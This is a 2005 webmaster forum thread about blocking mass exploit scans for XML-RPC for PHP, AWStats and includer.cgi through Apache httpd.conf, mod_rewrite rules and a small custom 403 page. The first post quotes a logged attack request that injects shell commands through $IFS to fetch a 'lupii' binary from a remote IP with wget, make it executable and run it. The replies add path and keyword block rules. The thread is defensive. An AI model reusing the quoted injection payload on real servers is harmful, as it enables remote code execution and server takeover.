Welcome to WebmasterWorld Guest from 54.224.166.141

Forum Moderators: Ocean10000 & phranque

Message Too Old, No Replies

How to nuke attackers via httpd.conf?

XML-RPC for PHP (+ lupii/listen) & AWStats exploits hitting hard

     
12:31 am on Dec 18, 2005 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Nov 5, 2005
posts:2040
votes: 1


1.) After weeks of relative calm, we're suddenly getting hammered again server-wide by what SANS terms:

XML-RPC for PHP Vulnerability Attack
[isc.sans.org...]

This thing makes the occasional FormMail exploit look like a flea on an elephant's rump. Here are the directories/files most frequently looked for in every all-in-one attack we're seeing:

/awstats/awstats.pl
/xmlrpc.php
/blog/xmlrpc.php
/blog/xmlsrv/xmlrpc.php
/blogs/xmlsrv/xmlrpc.php
/drupal/xmlrpc.php
/phpgroupware/xmlrpc.php
/wordpress/xmlrpc.php
/xmlrpc.php
/xmlrpc/xmlrpc.php
/xmlsrv/xmlrpc.php

And these, too, but less frequently --

/cgi-bin/includer.cgi
/scgi-bin/includer.cgi
/includer.cgi
/cgi-bin/include/includer.cgi
/scgi-bin/include/includer.cgi
/cgi-bin/inc/includer.cgi
/scgi-bin/inc/includer.cgi
/cgi-local/includer.cgi
/scgi-local/includer.cgi
/cgi/includer.cgi
/scgi/includer.cgi
/hints.pl
/cgi/hints.pl
/scgi/hints.pl
/cgi-bin/hints.pl
/scgi-bin/hints.pl
/hints/hints.pl
/cgi-bin/hints/hints.pl
/scgi-bin/hints/hints.pl
/webhints/hints.pl
/cgi-bin/webhints/hints.pl
/scgi-bin/webhints/hints.pl
/hints.cgi
/cgi/hints.cgi
/scgi/hints.cgi
/cgi-bin/hints.cgi
/scgi-bin/hints.cgic
/hints/hints.cgi
/cgi-bin/hints/hints.cgi
/scgi-bin/hints/hints.cgi
/webhints/hints.cgi
/cgi-bin/webhints/hints.cgi
/scgi-bin/webhints/hints.cgi

2.) We don't run PHP or AWStats or any of the above scripts so every single hit rewrites to a custom error page. And because of all the code spewed by each attack -- up to a WHOPPING 9300 characters+spaces and 99 lines in mere seconds for each IP! -- the scores and scores of complex hits are blowing up every site's access, error and rewrite logs. Here's just one of 33 similar lines from a single attack broken up at the IP to prevent side-scroll:

"GET /cgi-bin/includer.cgi?¦cd$IFS/tmp;wget$IFS`echo$IFS"$IFS"`
IP.address.here/lupii;chmod$IFS+x$IFS`echo$IFS"$IFS"`lupii;./lupii`echo$IFS"$IFS"`
IP.address.here¦ HTTP/1.1" 302 237 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

3.) I'm a Web geek not a SysAdmin so I know I can rewrite the 'bad' file requests to 403/Forbidden. However, I'd prefer to lock them out *before* they reach every single site. Thus my Q --

Is it possible to block attacks/file requests via httpd.conf (Apache 1.3.X)?

If yes, could someone please tell me precisely where/how so I can pass along the info? (The firewall kills nimda/Code Red, but this exploit is new and also involves many more file requests. Anyway...)

4.) Not being root, I won't have the luxury of testing tweaks until I find one that works. So what follows are a few ideas. Your thoughts, please?

a.) Because there's more than one directory involved in the attacks, the following (akin to httpd.conf's <Location /cgi-bin/phf*>. etc., section) won't snag everything --

<Location /cgi-bin/php*>
Deny from all
ErrorDocument 403 [127.0.0.1...]
</Location>

But how about adding all of these variations to stop almost all of the attacks?

<Location /php*>
Deny from all
ErrorDocument 403 [127.0.0.1...]
</Location>

<Location /awstats\.pl*>
Deny from all
ErrorDocument 403 [127.0.0.1...]
</Location>

<Location /hints\.pl*>
Deny from all
ErrorDocument 403 [127.0.0.1...]
</Location>

<Location /hints\.cgi*>
Deny from all
ErrorDocument 403 [127.0.0.1...]
</Location>

<Location /includer\.cgi*>
Deny from all
ErrorDocument 403 [127.0.0.1...]
</Location>

b.) Alternatively, might atypical Web words unique to the file requests/commands -- lupii, listen, awstats.pl, (also: awstats.pl?configdir=), chmod, echo -- be a way to stop these at the httpd.conf level... somehow?

c.) Finally (no, really), do you think simply adding the following to httpd.conf might do the trick server-wide? (Akin to httpd.conf's <Files ~ "^\.ht">, etc., section) --

<Files ~ "^\.php">
Order deny,allow
Deny from all
</Files>

<Files ~ "^\awstats\.pl">
Order deny,allow
Deny from all
</Files>

<Files ~ "^\hints\.cgi">
Order deny,allow
Deny from all
</Files>

<Files ~ "^\hints\.pl">
Order deny,allow
Deny from all
</Files>

<Files ~ "^\includer\.cgi">
Order deny,allow
Deny from all
</Files>

Thanks in advance for your assistance (& for slogging through this post, too)!

1:10 am on Dec 18, 2005 (gmt 0)

Senior Member

WebmasterWorld Senior Member jdmorgan is a WebmasterWorld Top Contributor of All Time 10+ Year Member

joined:Mar 31, 2002
posts:25430
votes: 0


Pfui,

The only recourse you have is to either block them using a 'smart' firewall, or to return a 403-Forbidden.

That can be accomplished using mod_access "Deny from <envar>" with mod_setenvif testing REQUEST_URI or by using mod_rewrite:


RewriteRule (awstats\.pl¦xmlrpc\.php¦includer\.cgi¦hints\.pl)$ - [F]

Of course, the problem is that you'll still be wasting bandwidth sending your custom 403 error page to these idiots.

A work-around (stay with me here) is to do the following:

Create a new subdirectory below web root.
Place a custom 403 error page in that subdirectory. Lets call it "403.html" for now. Leave out all the HEAD content, and just put a few characters in this file, so you can recognize it by filesize when fetched -- I use just the text "No."
Now create an .htaccess file in that subdirectory that contains the following:


ErrorDocument 403 /path_to_this_subdirectory/403.html
Options +FollowSymLinks
RewriteEngine on
RewriteRule !^403\.html$ - [F]

Now, instead of the first code snippet I posted above, use the following in httpd.conf or in your web root .htaccess file:

RewriteRule (awstats\.pl¦xmlrpc\.php¦includer\.cgi¦hints\.pl)$ /path_to_subdirectory/$1 [L]

Now when a bad-bot attempts to fetch one of those files, it gets rewritten to the subdirectory. But no files in that subdirectory are allowed to be fetched except for 403.html. So, the 403 error handler is invoked, and returns only a 403-Forbidden server response header and the three-byte response from 403.html, thus minimizing your bandwidth loss.

There are several ways to implement this idea using mod_access, SetEnvIf, etc. I just show mod_rewrite because all functions are available in that single module. If you decide to stick with "Location", then consider using LocationMatch instead. That way, you can use regular expressions and combine the filepath patterns as shown above for user-agents.

Set your RewriteLogLevel to 0 -- or to 1 if absolutely required -- unless you are actually debugging something.

You can also dig into mod_log_config and configure your logging to discard these requests from your log data after you're sure the code is working.

So bottom line is either block them at the firewall, or at least minimize their impact on your server, logs, and bandwidth utilization.

Change the broken pipe "¦" characters above to solid pipes before use; posting on this board modifies them.

Jim

8:24 pm on Dec 20, 2005 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Nov 5, 2005
posts:2040
votes: 1


Jim, thank you for your extended reply -- the bulk of which I'm still parsing:) I'm now testing this everything-but-the-kitchen-sink Rule:

RewriteRule (awstats¦awstats\.pl¦default\.ida¦echo¦FormMail\.cgi¦hints\.cgi¦hints\.pl¦includer\.cgi¦listen¦lupii¦stream¦xmlrpc\.php¦xmlsrv)$ - [NC,F]

(As always, broken lines are pipes.)

Thanks again!

.
P.S. /Search Ref
A related thread [webmasterworld.com].

 

Join The Conversation

Moderators and Top Contributors

Hot Threads This Week

Featured Threads

Free SEO Tools

Hire Expert Members